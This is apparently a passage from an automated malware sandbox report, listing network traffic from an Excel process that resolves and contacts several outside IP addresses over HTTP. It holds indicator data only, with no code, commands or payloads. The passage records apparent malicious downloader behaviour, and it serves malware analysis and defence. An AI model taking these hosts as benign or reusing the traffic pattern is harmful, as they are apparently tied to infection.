Apr 6, 2021 18:01:02.162374020 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 6, 2021 18:01:02.244944096 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:02.568733931 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:02.568774939 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:02.569022894 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 6, 2021 18:01:02.055234909 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 6, 2021 18:01:02.110025883 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Apr 6, 2021 18:01:02.585011005 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 6, 2021 18:01:02.641380072 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Apr 6, 2021 18:01:03.118591070 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 6, 2021 18:01:03.176975012 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Apr 6, 2021 18:01:03.739466906 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 6, 2021 18:01:03.785562038 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Apr 6, 2021 18:01:04.987745047 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 6, 2021 18:01:05.423103094 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 6, 2021 18:01:02.055234909 CEST | 192.168.2.22 | 8.8.8.8 | 0xd372 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 6, 2021 18:01:02.585011005 CEST | 192.168.2.22 | 8.8.8.8 | 0x7032 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 6, 2021 18:01:03.118591070 CEST | 192.168.2.22 | 8.8.8.8 | 0xad13 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 6, 2021 18:01:03.739466906 CEST | 192.168.2.22 | 8.8.8.8 | 0xb648 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 6, 2021 18:01:04.987745047 CEST | 192.168.2.22 | 8.8.8.8 | 0x82b3 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 6, 2021 18:01:02.110025883 CEST | 8.8.8.8 | 192.168.2.22 | 0xd372 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 6, 2021 18:01:02.641380072 CEST | 8.8.8.8 | 192.168.2.22 | 0x7032 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 6, 2021 18:01:03.176975012 CEST | 8.8.8.8 | 192.168.2.22 | 0xad13 | No error (0) | 192.185.56.250 | A (IP address) | IN (0x0001) | ||
Apr 6, 2021 18:01:03.785562038 CEST | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | 103.211.216.55 | A (IP address) | IN (0x0001) | ||
Apr 6, 2021 18:01:05.423103094 CEST | 8.8.8.8 | 192.168.2.22 | 0x82b3 | No error (0) | 111.118.215.222 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 18:01:02.162374020 CEST | 0 | OUT | |
Apr 6, 2021 18:01:02.568733931 CEST | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49166 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 18:01:02.689251900 CEST | 2 | OUT | |
Apr 6, 2021 18:01:03.103004932 CEST | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49167 | 192.185.56.250 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 18:01:03.341989994 CEST | 3 | OUT | |
Apr 6, 2021 18:01:03.720449924 CEST | 3 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49168 | 103.211.216.55 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 18:01:03.956880093 CEST | 4 | OUT | |
Apr 6, 2021 18:01:04.975133896 CEST | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49169 | 111.118.215.222 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 18:01:05.598428965 CEST | 6 | OUT | |
Apr 6, 2021 18:01:05.779242039 CEST | 7 | IN |